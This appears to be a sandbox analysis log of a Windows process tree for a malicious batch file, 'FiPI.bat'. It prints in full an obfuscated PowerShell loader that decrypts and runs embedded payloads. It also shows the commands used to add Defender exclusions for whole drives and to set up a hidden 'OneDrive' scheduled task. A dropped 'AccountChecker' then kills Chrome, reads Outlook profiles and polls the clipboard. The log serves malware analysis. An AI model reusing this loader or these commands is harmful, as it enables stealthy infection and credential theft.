  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3148 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:1
  2⤵
  PID:920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3228 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:1
  2⤵
  PID:4828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:8
  2⤵
  PID:3544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:8
  2⤵
  PID:3216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:8
  2⤵
  PID:1620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=744 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:8
  2⤵
  PID:4220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2644 --field-trial-handle=1872,i,11555198704929744065,10291899171089604458,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1324

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1860

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1768

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\FiPI.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\FiPI.bat" "
1⤵
PID:2716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Downloads\FiPI.bat"
  2⤵
  PID:832
- - C:\Users\Admin\Downloads\FiPI.bat.exe
    "C:\Users\Admin\Downloads\FiPI.bat.exe" -w hidden -c $WnRj='ChaeYmYngeeYmYExeYmYteeYmYnseYmYioeYmYneYmY'.Replace('eYmY', '');$VJAz='SpleYmYieYmYteYmY'.Replace('eYmY', '');$KhnP='TreYmYaneYmYseYmYforeYmYmeYmYFeYmYineYmYaleYmYBloeYmYceYmYkeYmY'.Replace('eYmY', '');$AKst='EleeYmYmeeYmYnteYmYAteYmY'.Replace('eYmY', '');$yrFV='CreYmYeateYmYeDeYmYecryeYmYpteYmYoreYmY'.Replace('eYmY', '');$tVNf='ReYmYeaeYmYdLieYmYneseYmY'.Replace('eYmY', '');$UImP='MaieYmYneYmYModeYmYuleeYmY'.Replace('eYmY', '');$hZRx='FreYmYomBeYmYaeYmYse6eYmY4SteYmYrineYmYgeYmY'.Replace('eYmY', '');$EFCg='IeYmYnvoeYmYkeYmYeeYmY'.Replace('eYmY', '');$mMJk='LeYmYoaeYmYdeYmY'.Replace('eYmY', '');$iZhW='GeteYmYCueYmYreYmYreeYmYntPeYmYroceYmYesseYmY'.Replace('eYmY', '');$GRwL='EneYmYtryeYmYPeYmYoeYmYinteYmY'.Replace('eYmY', '');function LbIFb($UaJWu){$ZzhZl=[System.Security.Cryptography.Aes]::Create();$ZzhZl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ZzhZl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ZzhZl.Key=[System.Convert]::$hZRx('gr5yEROYhpAa9X6djSsVtA1T/uxOFT8+pdBJiz+ibBU=');$ZzhZl.IV=[System.Convert]::$hZRx('Yrf8WLXrtNcnvkur0l1sYg==');$Dqwka=$ZzhZl.$yrFV();$bgwWe=$Dqwka.$KhnP($UaJWu,0,$UaJWu.Length);$Dqwka.Dispose();$ZzhZl.Dispose();$bgwWe;}function CDJIX($UaJWu){$whMDf=New-Object System.IO.MemoryStream(,$UaJWu);$xZRkN=New-Object System.IO.MemoryStream;$mfoNf=New-Object System.IO.Compression.GZipStream($whMDf,[IO.Compression.CompressionMode]::Decompress);$mfoNf.CopyTo($xZRkN);$mfoNf.Dispose();$whMDf.Dispose();$xZRkN.Dispose();$xZRkN.ToArray();}$RsRQV=[System.Linq.Enumerable]::$AKst([System.IO.File]::$tVNf([System.IO.Path]::$WnRj([System.Diagnostics.Process]::$iZhW().$UImP.FileName, $null)), 1);$wIVvi=$RsRQV.Substring(2).$VJAz(':');$pWiyV=CDJIX (LbIFb ([Convert]::$hZRx($wIVvi[0])));$NRsuL=CDJIX (LbIFb ([Convert]::$hZRx($wIVvi[1])));[System.Reflection.Assembly]::$mMJk([byte[]]$NRsuL).$GRwL.$EFCg($null,$null);[System.Reflection.Assembly]::$mMJk([byte[]]$pWiyV).$GRwL.$EFCg($null,$null);
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3676

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\FiPI.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:4384

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\FiPI (1).bat
1⤵
PID:4216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\FiPI (1).bat" "
1⤵
PID:4768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Downloads\FiPI (1).bat"
  2⤵
  PID:3084
- - C:\Users\Admin\Downloads\FiPI (1).bat.exe
    "C:\Users\Admin\Downloads\FiPI (1).bat.exe" -w hidden -c $WnRj='ChaeYmYngeeYmYExeYmYteeYmYnseYmYioeYmYneYmY'.Replace('eYmY', '');$VJAz='SpleYmYieYmYteYmY'.Replace('eYmY', '');$KhnP='TreYmYaneYmYseYmYforeYmYmeYmYFeYmYineYmYaleYmYBloeYmYceYmYkeYmY'.Replace('eYmY', '');$AKst='EleeYmYmeeYmYnteYmYAteYmY'.Replace('eYmY', '');$yrFV='CreYmYeateYmYeDeYmYecryeYmYpteYmYoreYmY'.Replace('eYmY', '');$tVNf='ReYmYeaeYmYdLieYmYneseYmY'.Replace('eYmY', '');$UImP='MaieYmYneYmYModeYmYuleeYmY'.Replace('eYmY', '');$hZRx='FreYmYomBeYmYaeYmYse6eYmY4SteYmYrineYmYgeYmY'.Replace('eYmY', '');$EFCg='IeYmYnvoeYmYkeYmYeeYmY'.Replace('eYmY', '');$mMJk='LeYmYoaeYmYdeYmY'.Replace('eYmY', '');$iZhW='GeteYmYCueYmYreYmYreeYmYntPeYmYroceYmYesseYmY'.Replace('eYmY', '');$GRwL='EneYmYtryeYmYPeYmYoeYmYinteYmY'.Replace('eYmY', '');function LbIFb($UaJWu){$ZzhZl=[System.Security.Cryptography.Aes]::Create();$ZzhZl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ZzhZl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ZzhZl.Key=[System.Convert]::$hZRx('gr5yEROYhpAa9X6djSsVtA1T/uxOFT8+pdBJiz+ibBU=');$ZzhZl.IV=[System.Convert]::$hZRx('Yrf8WLXrtNcnvkur0l1sYg==');$Dqwka=$ZzhZl.$yrFV();$bgwWe=$Dqwka.$KhnP($UaJWu,0,$UaJWu.Length);$Dqwka.Dispose();$ZzhZl.Dispose();$bgwWe;}function CDJIX($UaJWu){$whMDf=New-Object System.IO.MemoryStream(,$UaJWu);$xZRkN=New-Object System.IO.MemoryStream;$mfoNf=New-Object System.IO.Compression.GZipStream($whMDf,[IO.Compression.CompressionMode]::Decompress);$mfoNf.CopyTo($xZRkN);$mfoNf.Dispose();$whMDf.Dispose();$xZRkN.Dispose();$xZRkN.ToArray();}$RsRQV=[System.Linq.Enumerable]::$AKst([System.IO.File]::$tVNf([System.IO.Path]::$WnRj([System.Diagnostics.Process]::$iZhW().$UImP.FileName, $null)), 1);$wIVvi=$RsRQV.Substring(2).$VJAz(':');$pWiyV=CDJIX (LbIFb ([Convert]::$hZRx($wIVvi[0])));$NRsuL=CDJIX (LbIFb ([Convert]::$hZRx($wIVvi[1])));[System.Reflection.Assembly]::$mMJk([byte[]]$NRsuL).$GRwL.$EFCg($null,$null);[System.Reflection.Assembly]::$mMJk([byte[]]$pWiyV).$GRwL.$EFCg($null,$null);
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:3868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3868);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\FiPI (1)')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive dSNTndeQXL' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\dSNTndeQXL.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3476
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\dSNTndeQXL.vbs"
      4⤵
      Checks computer location settings
      PID:4464
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\dSNTndeQXL.cmd" "
        5⤵
        
        PID:1428
      - C:\Users\Admin\AppData\Roaming\dSNTndeQXL.cmd.exe
        
        "C:\Users\Admin\AppData\Roaming\dSNTndeQXL.cmd.exe" -w hidden -c $WnRj='ChaeYmYngeeYmYExeYmYteeYmYnseYmYioeYmYneYmY'.Replace('eYmY', '');$VJAz='SpleYmYieYmYteYmY'.Replace('eYmY', '');$KhnP='TreYmYaneYmYseYmYforeYmYmeYmYFeYmYineYmYaleYmYBloeYmYceYmYkeYmY'.Replace('eYmY', '');$AKst='EleeYmYmeeYmYnteYmYAteYmY'.Replace('eYmY', '');$yrFV='CreYmYeateYmYeDeYmYecryeYmYpteYmYoreYmY'.Replace('eYmY', '');$tVNf='ReYmYeaeYmYdLieYmYneseYmY'.Replace('eYmY', '');$UImP='MaieYmYneYmYModeYmYuleeYmY'.Replace('eYmY', '');$hZRx='FreYmYomBeYmYaeYmYse6eYmY4SteYmYrineYmYgeYmY'.Replace('eYmY', '');$EFCg='IeYmYnvoeYmYkeYmYeeYmY'.Replace('eYmY', '');$mMJk='LeYmYoaeYmYdeYmY'.Replace('eYmY', '');$iZhW='GeteYmYCueYmYreYmYreeYmYntPeYmYroceYmYesseYmY'.Replace('eYmY', '');$GRwL='EneYmYtryeYmYPeYmYoeYmYinteYmY'.Replace('eYmY', '');function LbIFb($UaJWu){$ZzhZl=[System.Security.Cryptography.Aes]::Create();$ZzhZl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ZzhZl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ZzhZl.Key=[System.Convert]::$hZRx('gr5yEROYhpAa9X6djSsVtA1T/uxOFT8+pdBJiz+ibBU=');$ZzhZl.IV=[System.Convert]::$hZRx('Yrf8WLXrtNcnvkur0l1sYg==');$Dqwka=$ZzhZl.$yrFV();$bgwWe=$Dqwka.$KhnP($UaJWu,0,$UaJWu.Length);$Dqwka.Dispose();$ZzhZl.Dispose();$bgwWe;}function CDJIX($UaJWu){$whMDf=New-Object System.IO.MemoryStream(,$UaJWu);$xZRkN=New-Object System.IO.MemoryStream;$mfoNf=New-Object System.IO.Compression.GZipStream($whMDf,[IO.Compression.CompressionMode]::Decompress);$mfoNf.CopyTo($xZRkN);$mfoNf.Dispose();$whMDf.Dispose();$xZRkN.Dispose();$xZRkN.ToArray();}$RsRQV=[System.Linq.Enumerable]::$AKst([System.IO.File]::$tVNf([System.IO.Path]::$WnRj([System.Diagnostics.Process]::$iZhW().$UImP.FileName, $null)), 1);$wIVvi=$RsRQV.Substring(2).$VJAz(':');$pWiyV=CDJIX (LbIFb ([Convert]::$hZRx($wIVvi[0])));$NRsuL=CDJIX (LbIFb ([Convert]::$hZRx($wIVvi[1])));[System.Reflection.Assembly]::$mMJk([byte[]]$NRsuL).$GRwL.$EFCg($null,$null);[System.Reflection.Assembly]::$mMJk([byte[]]$pWiyV).$GRwL.$EFCg($null,$null);
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Suspicious behavior: EnumeratesProcesses
        outlook_office_path
        outlook_win_path
        
        PID:2220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2220);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\dSNTndeQXL')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\Qvowtgvuow.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Qvowtgvuow.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1016
        
        C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe
        
        C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe
        8⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\index" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1696 --field-trial-handle=1700,i,14635249948350819737,6938906002145039636,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\index" --mojo-platform-channel-handle=1752 --field-trial-handle=1700,i,14635249948350819737,6938906002145039636,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\index" --app-path="C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2212 --field-trial-handle=1700,i,14635249948350819737,6938906002145039636,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        9⤵
        
        PID:4672
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        10⤵
        Enumerates processes with tasklist
        
        PID:4508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
        9⤵
        
        PID:4336
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM chrome.exe /F
        10⤵
        Kills process with taskkill
        
        PID:5064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        9⤵
        
        PID:4960
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        10⤵
        Enumerates processes with tasklist
        
        PID:3956
        
        C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2SfRM9GKwR60fV2iZCpr4n53ZxB\AccountChecker.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\index" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1548 --field-trial-handle=1700,i,14635249948350819737,6938906002145039636,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        9⤵
        
        PID:2236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:3856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:3872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:1164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:5000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:4408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:3144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:3208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:3864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:4328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:1200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:1912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:2668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:4568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:2644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:1504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:4596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:4348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:4992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:1544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:1652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:3724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:3664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:4676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:3988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:1620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:1280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:3184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:4816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:1304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:5016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:3200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:1544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:3920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:4924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:2784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:3308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:2504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:2968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:2612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:2300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:1388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:4124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:4960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:4816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:3208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:3460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:4136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:4880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:1168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:4712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:1860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        9⤵
        
        PID:1080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        
        PID:1392
        
        C:\Windows\system32\cmd.exe
        
